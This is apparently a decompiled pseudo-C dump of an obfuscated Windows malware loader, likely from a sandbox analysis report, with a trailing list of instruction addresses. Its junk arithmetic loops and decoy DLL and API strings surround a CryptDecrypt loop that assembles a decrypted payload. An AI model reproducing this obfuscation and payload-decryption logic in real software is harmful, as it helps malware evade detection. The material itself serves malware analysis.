                                                								_t1388 =  *0x4fef40; // 0x3c79b5d4
                                                								 *0x4feee8 = _t1388;
                                                								_v156 = _v28;
                                                								if(_v156 != 0) {
                                                									_v156 =  *((intOrPtr*)(_v156 - 4));
                                                								}
                                                								if(_v156 == 0x11) {
                                                									_v60 = 0xa7 - _v64;
                                                								}
                                                								 *_a4 = 0;
                                                								_v52 = (_v88 << 6) - _v88;
                                                								_v60 = _v44 + 0x7d;
                                                								_v64 = 0;
                                                								while(_v64 < 0xb) {
                                                									_v64 = _v64 + 1;
                                                									_v40 = 0;
                                                									_t2111 = _v40 - 5;
                                                									while(_v40 < 5) {
                                                										_v40 = _v40 + 1;
                                                										_t1724 = E004FEF50; // 0xa3b3f6c0
                                                										_push(_t1724);
                                                										_t2004 = E004FEF38; // 0xc3c34fdc
                                                										E004EE798(_v48, 0, _v92, _t2004, _t2111);
                                                									}
                                                								}
                                                								_v80 = _v92 + 4;
                                                								_v68 = _v48 - 0xa;
                                                								_t1401 =  *0x4fef30; // 0xa1d816
                                                								 *0x4feea0 = _t1401 +  *0x4feef0;
                                                								_v140 = 0;
                                                								_v144 = 0;
                                                								_v72 = _v48;
                                                								if(0x2e - _v64 >= 0x2b) {
                                                									__eflags = _v76 - _v52;
                                                									if(_v76 <= _v52) {
                                                										_v68 = _v76 * _v92;
                                                										_t1411 =  *0x4feea0; // 0xa1d900
                                                										_t1412 = _t1411 + 0x77;
                                                										__eflags = _t1412;
                                                										 *0x4fef48 = _t1412;
                                                									} else {
                                                										__eflags = 0;
                                                										_v60 = 0;
                                                										do {
                                                											E00407678(_v24, 0, 1,  &_v24);
                                                											_v60 = _v60 + 1;
                                                											__eflags = _v60 - 0xd;
                                                										} while (_v60 != 0xd);
                                                									}
                                                									 *0x4feefc = E004FEF0C * 0x72;
                                                									_t1414 =  *0x4fef4c; // 0x43c1493c
                                                									_t1415 = _t1414 - 8;
                                                									__eflags = _t1415;
                                                									E004FEF2C = _t1415;
                                                									_t1416 =  *0x4fef04; // 0x43c14963
                                                									E004FEF34 = _t1416;
                                                								} else {
                                                									_v88 = 0;
                                                									while(_v88 < 0xe) {
                                                										_v88 = _v88 + 1;
                                                										_v44 = 3 - _v80;
                                                									}
                                                									_v56 = _v32 * 0x6e;
                                                								}
                                                								_t1417 =  *0x4feee8; // 0xdcd0f434
                                                								E004FEF50 = _t1417;
                                                								_t1418 = E004FEF34; // 0xc3c34ef0
                                                								 *0x4feecc = _t1418;
                                                								_t1419 =  *0x4feed8; // 0x1cb9338e
                                                								 *0x4feed8 = E0040489C(_t1419);
                                                								_t1421 =  *0x4feea0; // 0xa1d900
                                                								 *0x4feefc = _t1421 + 4;
                                                								L176:
                                                								while(1) {
                                                									if(_v128 != 0) {
                                                										if(__eflags > 0) {
                                                											goto L129;
                                                										}
                                                									} else {
                                                										_t2118 = _v132;
                                                										if(_v132 > 0) {
                                                											L129:
                                                											__eflags = _v128;
                                                											if(__eflags != 0) {
                                                												if(__eflags <= 0) {
                                                													goto L134;
                                                												} else {
                                                													goto L133;
                                                												}
                                                											} else {
                                                												__eflags = _v132 - 0x100000;
                                                												if(_v132 <= 0x100000) {
                                                													L134:
                                                													_v60 = 0xeb - _v68;
                                                													_v180 = _v88 + 4;
                                                													asm("fild dword [ebp-0xb0]");
                                                													_v36 = E004048D8();
                                                													__eflags = _v76 - _v44 - _v56 - _v44;
                                                													if(_v76 - _v44 <= _v56 - _v44) {
                                                														_t1430 =  *0x4fef44; // 0x38993
                                                														_t1431 = _t1430 + _t1430;
                                                														__eflags = _t1431;
                                                														E004FEF0C = _t1431 + _t1431 * 4;
                                                													} else {
                                                														_v56 = 0;
                                                														__eflags = _v56 - 1;
                                                														while(_v56 < 1) {
                                                															_v56 = _v56 + 1;
                                                															_v44 = _v64 - 0x7d;
                                                															__eflags = _v56 - 1;
                                                														}
                                                														_v48 = _v32 + 0x9a;
                                                														 *0x4feea0 =  *0x4feeec * 0x75;
                                                													}
                                                													_t1433 = E004FEF2C; // 0xa1d900
                                                													E004FEF2C = _t1433;
                                                													_t1434 = E004FEF10; // 0x1cb931c0
                                                													_t1435 = _t1434 - 0x9f;
                                                													__eflags = _t1435;
                                                													 *0x4fef48 = _t1435;
                                                													asm("fild dword [0x4fef3c]");
                                                													 *0x4feee8 = E004048CC();
                                                													_v112 = _v132;
                                                												} else {
                                                													L133:
                                                													_t1664 = E004FEED0; // 0xc3c34ef0
                                                													 *0x4feef0 = _t1664;
                                                													_t1665 = E004FEF34; // 0xc3c34ef0
                                                													 *0x4feefc = _t1665;
                                                													_v60 = _v44 - 0xc3;
                                                													_t1668 =  *0x4fef30; // 0xa1d816
                                                													 *0x4fef14 = _t1668;
                                                													_v72 = _v80 + _v92;
                                                													_v64 = _v36 - 0xc7;
                                                													_v112 = _v136 + 0x100000;
                                                												}
                                                											}
                                                											_v84 = 0;
                                                											__eflags = _v84 - 6;
                                                											while(_v84 < 6) {
                                                												_v84 = _v84 + 1;
                                                												_v36 = _v48 + 4;
                                                												__eflags = _v84 - 6;
                                                											}
                                                											_t1440 = E00407774(L"davclnt.dll", 1, _v24);
                                                											__eflags = _t1440 - 0xee;
                                                											if(_t1440 < 0xee) {
                                                												_t1706 = _v72 * 0x5b;
                                                												__eflags = _t1706;
                                                												_v64 = _t1706;
                                                											}
                                                											_t1441 = E004FEF34; // 0xc3c34ef0
                                                											E004FEF34 = E0040489C(_t1441);
                                                											_v80 = _v56 * 0x5d;
                                                											_v92 = 0;
                                                											__eflags = _v92 - 4;
                                                											while(_v92 < 4) {
                                                												_v92 = _v92 + 1;
                                                												_v68 = _v40 - 0x8e;
                                                												__eflags = _v92 - 4;
                                                											}
                                                											_t1445 = E004FEF2C; // 0xa1d900
                                                											 *0x4fef3c = _t1445 + 0xb4;
                                                											_push(_v128);
                                                											_push(_v132);
                                                											 *_t2024 =  *_t2024 - _v112;
                                                											asm("sbb [esp+0x4], edx");
                                                											_pop(_t1449);
                                                											_v132 = _t1449;
                                                											_v128 = 0;
                                                											E00404658(_v12 + _v144, 0, _v112, _v120);
                                                											_v64 = _v76 * _v68;
                                                											__eflags = 0;
                                                											_v72 = 0;
                                                											do {
                                                												_t1455 = E004FEF38; // 0xc3c34fdc
                                                												__eflags = _t1455 -  *0x4feef0 - 0xe5;
                                                												if(_t1455 -  *0x4feef0 < 0xe5) {
                                                													_t1973 =  *0x4fef24; // 0x0
                                                													_t1697 = E00407774(L"Microsoft.WSMan.Management.ni.dll", 1, _t1973);
                                                													__eflags = _t1697 - 0x6d;
                                                													if(_t1697 == 0x6d) {
                                                														_t1699 = _v60 + 4;
                                                														__eflags = _t1699;
                                                														_v180 = _t1699;
                                                														asm("fild dword [ebp-0xb0]");
                                                														_v88 = E004048D8();
                                                													} else {
                                                														_v180 = _v84 + 4;
                                                														asm("fild dword [ebp-0xb0]");
                                                														_v48 = E004048D8();
                                                													}
                                                												}
                                                												_t1457 =  *0x4feed8; // 0x1cb9338e
                                                												__eflags = _t1457 -  *0x4fef28 - 0xa4;
                                                												if(_t1457 -  *0x4fef28 < 0xa4) {
                                                													_t1695 = _v36 + 0xa8;
                                                													__eflags = _t1695;
                                                													_v32 = _t1695;
                                                												}
                                                												_t1459 =  *0x4fef3c; // 0x1cb932a9
                                                												E004FEF34 = _t1459 + E004FEF0C;
                                                												_v72 = _v72 + 1;
                                                												__eflags = _v72 - 4;
                                                											} while (_v72 != 4);
                                                											_t1461 =  *0x4fef28; // 0x3c79b5d4
                                                											 *0x4fef4c = _t1461;
                                                											_t1462 =  *0x4feea0; // 0xa1d900
                                                											__eflags = _t1462 -  *0x4fef18 - 0x34;
                                                											if(_t1462 -  *0x4fef18 >= 0x34) {
                                                												_t1464 = E004FEF20; // 0x6e687a1a
                                                												E004FEF20 = E0040489C(_t1464);
                                                												 *0x4fef40 =  *0x4fef40 + 0xbe;
                                                												__eflags =  *0x4fef40;
                                                											} else {
                                                												_t1693 = E004FEF00; // 0xa3b3f6c0
                                                												 *0x4feefc = _t1693;
                                                											}
                                                											_t1466 =  *0x4fef3c; // 0x1cb932a9
                                                											 *0x4feee8 = _t1466 -  *0x4fef14;
                                                											_t1468 =  *0x4feef0; // 0x44632301
                                                											 *0x4feef0 = _t1468;
                                                											_v144 = _v144 + _v112;
                                                											_t1473 = CryptDecrypt(_v100, 0, 0xffffffff, 0, _v120,  &_v112);
                                                											__eflags = _t1473;
                                                											if(_t1473 == 0) {
                                                												_v44 = _v84 + _v76;
                                                												_v52 = _v40 + _v36;
                                                												_t1478 = E004FEF0C; // 0xb52124bf
                                                												E004FEF0C = _t1478;
                                                												__eflags = 0x43 -  *0x4feed8 - 0x45;
                                                												if(0x43 -  *0x4feed8 >= 0x45) {
                                                													_t1481 =  *0x4feec8; // 0x0
                                                													_v160 = _t1481;
                                                													__eflags = _v160;
                                                													if(_v160 != 0) {
                                                														_t1635 = _v160 - 4;
                                                														__eflags = _t1635;
                                                														_v160 =  *_t1635;
                                                													}
                                                													__eflags = _v160 - 0xed;
                                                													if(_v160 > 0xed) {
                                                														_t1632 = _v88 + 0xf4;
                                                														__eflags = _t1632;
                                                														_v180 = _t1632;
                                                														asm("fild dword [ebp-0xb0]");
                                                														_v56 = E004048CC();
                                                													}
                                                												} else {
                                                													_v72 = _v48 + 4;
                                                												}
                                                												_v68 = 0;
                                                												__eflags = _v68 - 5;
                                                												while(_v68 < 5) {
                                                													_v68 = _v68 + 1;
                                                													_v32 = 0;
                                                													_t1629 = E004FEED0; // 0xc3c34ef0
                                                													E004FEED0 = E0040489C(_t1629);
                                                													__eflags = _v68 - 5;
                                                												}
                                                												E004FEF2C =  *0x4feefc * 0xf1;
                                                											} else {
                                                												_v36 = _v84 * _v60;
                                                												_v180 = _v80 + 4;
                                                												asm("fild dword [ebp-0xb0]");
                                                												_v44 = E004048D8();
                                                												_v56 = _v52 - 0x80;
                                                												_t1646 =  *0x4fef18; // 0xbc3e19a
                                                												 *0x4fef18 = E0040489C(_t1646);
                                                												_v68 = _v88 * _v72;
                                                												_v48 = 0;
                                                												__eflags = _v48 - 9;
                                                												while(_v48 < 9) {
                                                													_v48 = _v48 + 1;
                                                													_t1691 = E004FEED0; // 0xc3c34ef0
                                                													E004FEED0 = E0040489C(_t1691);
                                                													__eflags = _v48 - 9;
                                                												}
                                                												E00404658(_v120, 0, _v112,  *_v16 + _v140);
                                                												 *_a4 =  *_a4 + _v112;
                                                												_v84 = 0;
                                                												__eflags = _v84 - 0xa;
                                                												while(__eflags < 0) {
                                                													_v84 = _v84 + 1;
                                                													E00407678(_v24, 0, 1,  &_v24);
                                                													_t1678 =  *0x4fef28; // 0x3c79b5d4
                                                													 *0x4feee0 = _t1678;
                                                													_v48 = _v36 - 0x9a;
                                                													_v56 = _v52 + 4;
                                                													_t1683 =  *0x4fef18; // 0xbc3e19a
                                                													 *0x4fef18 = E0040489C(_t1683);
                                                													_t1685 =  *0x4feeec; // 0xb52124f2
                                                													 *0x4fef28 = _t1685;
                                                													_t1686 =  *0x4fef18; // 0xbc3e19a
                                                													__eflags = _t1686 -  *0x4fef28; // 0x3c79b5d4
                                                													if(__eflags >= 0) {
                                                														_t1687 = _v68 * 0x32;
                                                														__eflags = _t1687;
                                                														_v60 = _t1687;
                                                													} else {
                                                														_v92 = 0;
                                                														_v40 = _v64 * _v44;
                                                													}
                                                													__eflags = _v84 - 0xa;
                                                												}
                                                												_t1654 =  *0x4feecc; // 0xd26bafe0
                                                												_v180 = _t1654 + 0x85;
                                                												asm("fild dword [ebp-0xb0]");
                                                												 *0x4feef4 = E004048CC();
                                                												_t1657 = E004FEF10; // 0x1cb931c0
                                                												E004FEF20 = _t1657;
                                                												_t1658 =  *0x4feedc; // 0xbc3e19a
                                                												 *0x4fef40 = _t1658 +  *0x4feea0;
                                                												asm("fild dword [0x4fef20]");
                                                												 *0x4feedc = E004048CC();
                                                												_t1661 =  *0x4feeec; // 0xb52124f2
                                                												E004FEF00 = _t1661 - 0x14;
                                                												_v140 = _v140 + _v112;
                                                												continue;
                                                											}
                                                										} else {
                                                										}
                                                									}
                                                									_t1484 =  *0x4feef4; // 0xb52124ca
                                                									 *0x4feef4 = E0040489C(_t1484);
                                                									E004F0EBC(0x4fef44,  &E004FEF10, _t2118);
                                                									_v60 = _v48 - _v88;
                                                									_t1975 =  *0x4feed4; // 0x0
                                                									if(E00407774(L"dxmasf.dll", 1, _t1975) != 0x83) {
                                                										_v80 = 0;
                                                										while(_v80 < 9) {
                                                											_v80 = _v80 + 1;
                                                											E00406CF4( &_v24, L"WcnEapPeerProxy.dll");
                                                										}
                                                										_t1625 =  *0x4feecc; // 0xd26bafe0
                                                										 *0x4feeec = _t1625;
                                                									}
                                                									_v56 = _v44;
                                                									_v64 = 0;
                                                									do {
                                                										_t1494 =  *0x4fef30; // 0xa1d816
                                                										_t1976 =  *0x4feeec; // 0xb52124f2
                                                										if(_t1494 - E004FEF2C > _t1976 - E004FEF2C) {
                                                											_v84 = 0;
                                                											_t2124 = _v84 - 0xd;
                                                											while(_v84 < 0xd) {
                                                												_v84 = _v84 + 1;
                                                												_t1621 =  *0x4fef48; // 0xc3c34ef0
                                                												_push(_t1621);
                                                												_t1993 =  *0x4fef40; // 0x3c79b5d4
                                                												_v52 = E004EE798(_v44, 0, _v92, _t1993, _t2124);
                                                											}
                                                										}
                                                										_v64 = _v64 + 1;
                                                									} while (_v64 != 9);
                                                									if(_v128 == 0 && _v132 == 0) {
                                                										_v17 = 1;
                                                										_v64 = _v80 + 0xa0;
                                                										_v72 = _v48 - _v36;
                                                										_v68 = 0;
                                                										while(_v68 < 7) {
                                                											_v68 = _v68 + 1;
                                                											E00406CF4( &_v24, _v24);
                                                											asm("fild dword [ebp-0x38]");
                                                											_v40 = E004048D8();
                                                											_v76 = 0;
                                                											do {
                                                												_v84 = _v92 + 4;
                                                												_v76 = _v76 + 1;
                                                											} while (_v76 != 5);
                                                										}
                                                										_v44 = 0;
                                                										while(_v44 < 0xc) {
                                                											_v44 = _v44 + 1;
                                                											_t1613 = E004FEED0; // 0xc3c34ef0
                                                											 *0x4feed8 = _t1613;
                                                										}
                                                										_t1603 =  *0x4feef0; // 0x44632301
                                                										_t1990 =  *0x4feee0; // 0x747938b
                                                										if(_t1603 -  *0x4feeec <= _t1990 -  *0x4feeec) {
                                                											_t1605 =  *0x4fef28; // 0x3c79b5d4
                                                											_t1606 = _t1605 + E004FEF00;
                                                											__eflags = _t1606;
                                                											 *0x4feed8 = _t1606;
                                                										} else {
                                                											_t1611 =  *0x4feea0; // 0xa1d900
                                                											 *0x4fef30 = _t1611 +  *0x4fef28;
                                                										}
                                                										_t1607 =  *0x4fef28; // 0x3c79b5d4
                                                										 *0x4feef4 = _t1607;
                                                										_t1608 =  *0x4feef4; // 0xb52124ca
                                                										_t2136 = _t1608 -  *0x4feed8; // 0x1cb9338e
                                                										if(_t2136 > 0) {
                                                											_t1609 = E004FEF00; // 0xa3b3f6c0
                                                											E004FEF34 = _t1609 -  *0x4fef48;
                                                										}
                                                									}
                                                									_v56 = _v84 + 4;
                                                									_t1498 = E004FEF10; // 0x1cb931c0
                                                									E004FEF10 = E0040489C(_t1498);
                                                									_t1500 = E004FEF50; // 0xa3b3f6c0
                                                									 *0x4fef14 = _t1500;
                                                									_t1501 = E004FEF10; // 0x1cb931c0
                                                									_t2138 = _t1501 -  *0x4fef14; // 0xb52124ca
                                                									if(_t2138 >= 0) {
                                                										_v40 = 0;
                                                										__eflags = _v40 - 7;
                                                										while(_v40 < 7) {
                                                											_v40 = _v40 + 1;
                                                											_t1585 =  *0x4fef28; // 0x3c79b5d4
                                                											E004FEED0 = _t1585;
                                                											__eflags = _v40 - 7;
                                                										}
                                                										E00406CF4( &_v24, _v28);
                                                										asm("fild dword [ebp-0x40]");
                                                										_v52 = E004048CC();
                                                										_t1507 = _v48 - 0xe7;
                                                										__eflags = _t1507;
                                                										_v64 = _t1507;
                                                									} else {
                                                										_t1586 = E004FEF38; // 0xc3c34fdc
                                                										E004FEF38 = E0040489C(_t1586);
                                                										_t1588 = E004FEF38; // 0xc3c34fdc
                                                										_t2139 = _t1588 -  *0x4fef14; // 0xb52124ca
                                                										if(_t2139 < 0) {
                                                											_t1592 =  *0x4fef4c; // 0x43c1493c
                                                											 *0x4fef4c = E0040489C(_t1592);
                                                											_t1594 = E004FEF38; // 0xc3c34fdc
                                                											_t2140 = _t1594 -  *0x4fef4c; // 0x43c1493c
                                                											if(_t2140 > 0) {
                                                												_v80 = E004F0EBC( &_v80, 0x4feecc, _t2140);
                                                											}
                                                										}
                                                										_v180 = _v32 + 0xeb;
                                                										asm("fild dword [ebp-0xb0]");
                                                										_v60 = E004048CC();
                                                									}
                                                									_v44 = 0;
                                                									_t1509 =  *0x4fef14; // 0xb52124ca
                                                									 *0x4feea0 = _t1509;
                                                									_t1510 =  *0x4feedc; // 0xbc3e19a
                                                									 *0x4feef0 = _t1510 + E004FEF10;
                                                									_t1512 =  *0x4feed8; // 0x1cb9338e
                                                									 *0x4fef28 = _t1512 * E004FEF20;
                                                									_t1514 = E004FEF50; // 0xa3b3f6c0
                                                									_t1894 =  *0x4feefc; // 0x4b08dcc7
                                                									_t1515 = E004FEF38; // 0xc3c34fdc
                                                									 *0x4fef18 = E004EE798(_t1515, 0, _t1894, _v80, _t2140);
                                                									 *0x4feea0 = E004FEED0 * 0xec;
                                                									_t1981 = _t1514;
                                                									 *[fs:eax] = _t1981;
                                                									_push(E004F29AC);
                                                									if(_v80 + 0xed < _v40) {
                                                										_v88 = 0;
                                                										do {
                                                											E00407678(_v24, 0, 1,  &_v24);
                                                											_v88 = _v88 + 1;
                                                										} while (_v88 != 5);
                                                										if(_v48 - _v32 >= 0x4e) {
                                                											asm("fild dword [ebp-0x28]");
                                                											_v72 = E004048CC();
                                                										} else {
                                                											_v56 = _v68 - _v76;
                                                										}
                                                										_v32 = _v84 * _v48;
                                                									}
                                                									_t1521 =  *0x4feed8; // 0x1cb9338e
                                                									if(_t1521 -  *0x4fef18 >= 0x78) {
                                                										asm("fild dword [0x4fef18]");
                                                										 *0x4feefc = E004048D8();
                                                									} else {
                                                										asm("fild dword [ebp-0x3c]");
                                                										_v92 = E004048D8();
                                                										E00406CF4( &_v24, L"rtm.dll");
                                                										_v52 = 0;
                                                										while(_v52 < 0xd) {
                                                											_v52 = _v52 + 1;
                                                											_t1572 = E004FEF0C; // 0xb52124bf
                                                											 *0x4fef40 = _t1572 + 0x2c;
                                                										}
                                                									}
                                                									_t1524 =  *0x4feeec; // 0xb52124f2
                                                									 *0x4fef14 = _t1524 + E004FEF0C;
                                                									if(_v68 - _v60 >= _v68) {
                                                										_t1528 =  *0x4fef28 * 0xdc;
                                                										__eflags = _t1528;
                                                										 *0x4fef18 = _t1528;
                                                									} else {
                                                										_t1562 = E004FEF38; // 0xc3c34fdc
                                                										E004FEF38 = E0040489C(_t1562);
                                                										_t1564 =  *0x4fef18; // 0xbc3e19a
                                                										 *0x4fef40 = _t1564;
                                                										_t1565 = E004FEF38; // 0xc3c34fdc
                                                										_t2150 = _t1565 -  *0x4fef40; // 0x3c79b5d4
                                                										if(_t2150 < 0) {
                                                											E00406CF4( &_v24, _v24);
                                                										}
                                                									}
                                                									_t1529 = E004FEF20; // 0x6e687a1a
                                                									 *0x4fef4c = _t1529;
                                                									E004044D0(_v120);
                                                									_v76 = _v64 + 0x37;
                                                									_v84 = 0;
                                                									while(_v84 < 0xd) {
                                                										_v84 = _v84 + 1;
                                                										E00406CF4( &_v24, L"GetKeyboardState");
                                                									}
                                                									_v164 = _v24;
                                                									if(_v164 != 0) {
                                                										_v164 =  *((intOrPtr*)(_v164 - 4));
                                                									}
                                                									if(_v164 > 0x8d) {
                                                										_v56 = _v80 - _v60;
                                                										_t1548 =  *0x4fef1c; // 0x0
                                                										_v168 = _t1548;
                                                										if(_v168 != 0) {
                                                											_v168 =  *((intOrPtr*)(_v168 - 4));
                                                										}
                                                										if(_v168 <= 0x2f) {
                                                											__eflags = 0;
                                                											_v92 = 0;
                                                											do {
                                                												E004F0EBC(0x4feee8,  &_v84, __eflags);
                                                												_v92 = _v92 + 1;
                                                												__eflags = _v92 - 0xc;
                                                											} while (__eflags != 0);
                                                										} else {
                                                											_v72 = _v44 + _v68;
                                                										}
                                                									}
                                                									_t1536 =  *0x4feedc; // 0xbc3e19a
                                                									_t2159 = _t1536 - E004FEF0C -  *0x4fef14; // 0xb52124ca
                                                									if(_t2159 != 0) {
                                                										_t1538 = E004FEF34; // 0xc3c34ef0
                                                										 *0x4feecc = _t1538;
                                                										_t1539 =  *0x4feefc * 0x4f;
                                                										__eflags = _t1539;
                                                										 *0x4feef0 = _t1539;
                                                									} else {
                                                										_v88 = _v36;
                                                									}
                                                									_t1540 =  *0x4feef4; // 0xb52124ca
                                                									E004FEF2C = _t1540 + 4;
                                                									_t1542 =  *0x4feedc; // 0xbc3e19a
                                                									_push(_t1542);
                                                									_t1897 =  *0x4feef4; // 0xb52124ca
                                                									_t1544 = E004EE798(_v72, 0, _t1897, _v40, _t1540 + 4);
                                                									 *0x4feef4 = _t1544;
                                                									return _t1544;
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                				goto L289;
                                                			}




























































































































































































































































































































                                                0x004f0fbd
                                                0x004f0fbf
                                                0x004f0fc5
                                                0x004f0fca
                                                0x004f0fcd
                                                0x004f0fd0
                                                0x004f0fd3
                                                0x004f0fd6
                                                0x004f0fdb
                                                0x004f0fdc
                                                0x004f0fe1
                                                0x004f0fe4
                                                0x004f0fe7
                                                0x004f0ff2
                                                0x004f1000
                                                0x004f1008
                                                0x004f100f
                                                0x004f1011
                                                0x004f1019
                                                0x004f102e
                                                0x004f1041
                                                0x004f1046
                                                0x004f104b
                                                0x004f1055
                                                0x004f1030
                                                0x004f1030
                                                0x004f103a
                                                0x004f103a
                                                0x004f1062
                                                0x004f106b
                                                0x004f1071
                                                0x004f107c
                                                0x004f107f
                                                0x004f1085
                                                0x004f108d
                                                0x004f1096
                                                0x004f1099
                                                0x004f109e
                                                0x004f10a3
                                                0x004f10a8
                                                0x004f10a8
                                                0x004f10b8
                                                0x004f10bd
                                                0x004f10c8
                                                0x004f10d8
                                                0x004f10dd
                                                0x004f10e5
                                                0x004f10ea
                                                0x004f10ef
                                                0x004f10f4
                                                0x004f10f9
                                                0x004f10ff
                                                0x004f1109
                                                0x004f1109
                                                0x004f110e
                                                0x004f1118
                                                0x004f1121
                                                0x004f1124
                                                0x004f112e
                                                0x004f113b
                                                0x004f1144
                                                0x004f114a
                                                0x004f114f
                                                0x004f1150
                                                0x004f1155
                                                0x004f1158
                                                0x004f1165
                                                0x004f116a
                                                0x004f116f
                                                0x004f1182
                                                0x004f118d
                                                0x004f1196
                                                0x004f119c
                                                0x004f119d
                                                0x004f11a3
                                                0x004f11b1
                                                0x004f11c3
                                                0x004f11cb
                                                0x004f306b
                                                0x004f3074
                                                0x004f3082
                                                0x004f3090
                                                0x004f309b
                                                0x004f30a4
                                                0x004f30af
                                                0x004f30b8
                                                0x004f30bd
                                                0x004f30c0
                                                0x004f31dd
                                                0x004f31df
                                                0x004f31e2
                                                0x004f31e5
                                                0x004f31f7
                                                0x004f11d1
                                                0x004f11d3
                                                0x004f11d4
                                                0x004f11d9
                                                0x004f11dc
                                                0x004f11e7
                                                0x004f11ec
                                                0x004f11f1
                                                0x004f11f9
                                                0x004f1206
                                                0x004f1213
                                                0x004f1213
                                                0x004f1220
                                                0x004f124d
                                                0x004f1250
                                                0x004f1255
                                                0x004f125a
                                                0x004f125f
                                                0x004f1265
                                                0x004f1290
                                                0x004f1295
                                                0x004f1267
                                                0x004f126d
                                                0x004f1272
                                                0x004f128b
                                                0x004f1274
                                                0x004f1274
                                                0x004f127e
                                                0x004f127e
                                                0x004f1272
                                                0x004f1222
                                                0x004f122b
                                                0x004f1230
                                                0x004f1233
                                                0x004f1239
                                                0x004f123c
                                                0x004f123f
                                                0x004f1245
                                                0x004f129a
                                                0x004f12a5
                                                0x004f12b3
                                                0x004f12b5
                                                0x004f12bd
                                                0x004f12bd
                                                0x004f12c2
                                                0x004f12cd
                                                0x004f12e7
                                                0x004f12ef
                                                0x004f2f06
                                                0x004f2f09
                                                0x004f2f0c
                                                0x004f2f11
                                                0x004f2f16
                                                0x004f2f23
                                                0x004f2f26
                                                0x004f2f2b
                                                0x004f2f30
                                                0x004f2f32
                                                0x004f2f35
                                                0x004f2f3b
                                                0x004f2f41
                                                0x004f2f4c
                                                0x004f2f4f
                                                0x004f2f52
                                                0x004f2f52
                                                0x004f2f5c
                                                0x004f2f65
                                                0x004f2f71
                                                0x004f2f7a
                                                0x004f2f83
                                                0x004f2f8a
                                                0x004f2f92
                                                0x004f2f98
                                                0x004f2fa5
                                                0x004f2faa
                                                0x004f2feb
                                                0x004f2ff0
                                                0x00000000
                                                0x004f2ff0
                                                0x004f2fac
                                                0x004f2fb1
                                                0x004f2fb6
                                                0x004f2fbb
                                                0x004f2fc0
                                                0x004f2fc5
                                                0x004f2fcb
                                                0x004f2fd9
                                                0x004f2fde
                                                0x004f2fe4
                                                0x00000000
                                                0x004f2fe4
                                                0x004f2fcd
                                                0x004f2fd2
                                                0x00000000
                                                0x004f2fd2
                                                0x004f12f8
                                                0x004f1304
                                                0x004f130d
                                                0x004f1318
                                                0x004f131f
                                                0x004f1326
                                                0x004f1328
                                                0x004f132d
                                                0x004f1330
                                                0x004f1330
                                                0x004f1335
                                                0x004f133a
                                                0x004f133d
                                                0x004f1343
                                                0x004f1326
                                                0x004f1350
                                                0x004f1353
                                                0x004f1358
                                                0x004f135d
                                                0x004f1362
                                                0x004f1367
                                                0x004f136c
                                                0x004f1372
                                                0x004f137c
                                                0x004f137c
                                                0x004f137f
                                                0x004f1387
                                                0x004f138d
                                                0x004f1398
                                                0x004f139d
                                                0x004f13a2
                                                0x004f13ac
                                                0x004f13b3
                                                0x004f13b4
                                                0x004f13b9
                                                0x004f13bc
                                                0x004f13ce
                                                0x004f13d6
                                                0x004f2d4e
                                                0x004f2d57
                                                0x004f2d5e
                                                0x004f2d68
                                                0x004f2d73
                                                0x004f2d76
                                                0x004f2d81
                                                0x004f2d88
                                                0x004f2d8b
                                                0x004f2d8e
                                                0x004f2d99
                                                0x004f2da2
                                                0x004f2da5
                                                0x004f2daa
                                                0x004f2daf
                                                0x004f2db9
                                                0x004f2dbe
                                                0x004f2dc9
                                                0x004f2dcc
                                                0x004f2e1a
                                                0x004f2e25
                                                0x004f2e2b
                                                0x004f2e2f
                                                0x004f2e32
                                                0x004f2e36
                                                0x004f2e38
                                                0x004f2e41
                                                0x004f2e46
                                                0x004f2e46
                                                0x004f2e36
                                                0x004f2dce
                                                0x004f2dce
                                                0x004f2dd3
                                                0x004f2dd8
                                                0x004f2ddd
                                                0x004f2de3
                                                0x004f2e15
                                                0x004f2de5
                                                0x004f2de7
                                                0x004f2dea
                                                0x004f2dee
                                                0x004f2df0
                                                0x004f2e00
                                                0x004f2e05
                                                0x004f2e05
                                                0x004f2dee
                                                0x004f2de3
                                                0x004f2e52
                                                0x004f2e59
                                                0x004f2e65
                                                0x004f2e70
                                                0x004f2e7c
                                                0x004f2e85
                                                0x004f2e88
                                                0x004f2e8d
                                                0x004f2e92
                                                0x004f2e97
                                                0x004f2e9c
                                                0x004f2ea1
                                                0x004f2ea7
                                                0x004f2eb8
                                                0x004f2eb8
                                                0x004f2ebd
                                                0x004f2ea9
                                                0x004f2ea9
                                                0x004f2eae
                                                0x004f2eae
                                                0x004f2ec6
                                                0x004f2ecb
                                                0x004f2ef3
                                                0x004f2ef3
                                                0x004f2ef6
                                                0x00000000
                                                0x004f2ef6
                                                0x004f2ecf
                                                0x004f2ed2
                                                0x004f2ed6
                                                0x004f2ed8
                                                0x00000000
                                                0x004f2ee1
                                                0x004f2ef9
                                                0x004f13dc
                                                0x004f13dc
                                                0x004f13e7
                                                0x004f13ed
                                                0x004f146a
                                                0x004f1472
                                                0x004f1472
                                                0x004f1478
                                                0x004f13ef
                                                0x004f13f1
                                                0x004f13f8
                                                0x004f13fa
                                                0x004f13fd
                                                0x004f1402
                                                0x004f1407
                                                0x004f1413
                                                0x004f1416
                                                0x004f1420
                                                0x004f1427
                                                0x004f142e
                                                0x004f1430
                                                0x004f1439
                                                0x004f143f
                                                0x004f144a
                                                0x004f144d
                                                0x004f1457
                                                0x004f1457
                                                0x004f147b
                                                0x004f1486
                                                0x004f148b
                                                0x004f1495
                                                0x004f149d
                                                0x004f14a2
                                                0x004f14ad
                                                0x004f14b4
                                                0x004f14b5
                                                0x004f14ba
                                                0x004f14bd
                                                0x004f14c2
                                                0x004f14c9
                                                0x004f14cb
                                                0x004f14ce
                                                0x004f14d3
                                                0x004f14de
                                                0x004f14e3
                                                0x004f14ea
                                                0x004f14ec
                                                0x004f14f5
                                                0x004f14f8
                                                0x004f1509
                                                0x004f1513
                                                0x004f1513
                                                0x004f1518
                                                0x004f151e
                                                0x004f1523
                                                0x004f1528
                                                0x004f152d
                                                0x004f153a
                                                0x004f1547
                                                0x004f1547
                                                0x004f1554
                                                0x004f15c0
                                                0x004f15c5
                                                0x004f15c5
                                                0x004f15cf
                                                0x004f1556
                                                0x004f155c
                                                0x004f155f
                                                0x004f1564
                                                0x004f156b
                                                0x004f156e
                                                0x004f156e
                                                0x004f1573
                                                0x004f1578
                                                0x004f157d
                                                0x004f1583
                                                0x004f1597
                                                0x004f15a2
                                                0x004f1585
                                                0x004f1590
                                                0x004f1590
                                                0x004f15a7
                                                0x004f15aa
                                                0x004f15b0
                                                0x004f15d4
                                                0x004f15df
                                                0x004f15e4
                                                0x004f15ec
                                                0x004f15f1
                                                0x004f15f6
                                                0x004f15fb
